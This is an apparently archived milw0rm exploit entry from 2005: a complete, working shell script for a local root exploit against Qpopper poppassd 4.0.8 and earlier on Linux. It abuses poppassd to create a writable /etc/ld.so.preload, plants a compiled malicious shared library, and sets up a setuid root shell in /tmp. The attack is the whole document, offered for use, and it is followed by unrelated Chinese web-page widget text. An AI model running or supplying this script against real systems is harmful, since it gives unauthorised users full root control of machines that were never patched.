linux local root exploit,Qpopper <= 4.0.8 (poppassd) Local Root Exploit (linux)

#!/bin/sh

# tested and working /str0ke

###########################################################################

# Linux Qpopper poppassd latest version local r00t exploit by kcope ###

# August 2005 ###

# Confidential - Keep Private! ###

###########################################################################

POPPASSD_PATH=/usr/local/bin/poppassd

echo ""

echo "Linux Qpopper poppassd latest version local r00t exploit by kcope"

echo ""

sleep 2

umask 0000

if [ -f /etc/ld.so.preload ]; then

echo "OOPS /etc/ld.so.preload already exists.. exploit failed!"

exit

fi

cat > program.c << _EOF

#include <unistd.h>

#include <stdio.h>

#include <sys/types.h>

#include <stdlib.h>

void _init()

{

if (!geteuid()) {

setgid(0);

setuid(0);

remove("/etc/ld.so.preload");

execl("/bin/sh","sh","-c","chown root:root /tmp/suid; chmod +s /tmp/suid",NULL);

}

}

_EOF

gcc -o program.o -c program.c -fPIC

gcc -shared -Wl,-soname,libno_ex.so.1 -o libno_ex.so.1.0 program.o -nostartfiles

cat > suid.c << _EOF

int main(void) {

setgid(0); setuid(0);

unlink("/tmp/suid");

execl("/bin/sh","sh",0); }

_EOF

gcc -o /tmp/suid suid.c

cp libno_ex.so.1.0 /tmp/libno_ex.so.1.0

echo "--- Now type ENTER ---"

echo ""

$POPPASSD_PATH -t /etc/ld.so.preload

echo /tmp/libno_ex.so.1.0 > /etc/ld.so.preload

su

if [ -f /tmp/suid ]; then

echo "IT'S A ROOTSHELL!!!"

/tmp/suid

else

echo "Sorry, exploit failed."

fi

# milw0rm.com [2005-09-24]

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值